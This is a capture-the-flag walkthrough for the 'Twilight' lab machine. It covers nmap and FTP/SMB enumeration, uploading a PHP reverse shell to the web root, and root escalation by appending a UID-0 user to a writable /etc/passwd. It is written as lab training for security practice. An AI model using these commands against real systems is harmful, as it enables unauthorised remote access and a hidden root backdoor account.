Twilight Walkthrough

Scanning the box with “nmap -T4 -A 192.168.8.189 -vv”

We have few ports are open, port 2121 is for FTP service, and we connect to it “ ftp 192.168.8.189 2121”

We can see from the Nmap results there is a file there we can pull it and read it on our machine, and the login username and password are the same “anonymous”:

But when we got the file there were some strange letters there and nothing more to do, so I moved on to the next step and using SMB services to enumerate:

Using “smbclient -L //192.168.8.189/ -U “ “ -N” came with a sharename “WRKSHARE”:

smbclient \\\\192.168.8.189\\WRKSHARE

Now we in and the next step is to upload a reverse shell in the path “/var/www/html”:

And we open the file in the browser “192.168.8.189/rshell.php” while we have a listening port on our machine:

I took a look at the “passwd” file and it’s writable, so we can add a new user with the root privilege:

openssl passwd -1 -salt hacker 123456

echo ‘hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:www-data:bin/bash’ >> /etc/passwd

Now we “ su hacker” and the password “123456”:

We got the root flag, also there is a user flag in the home directory for a user named “miguel”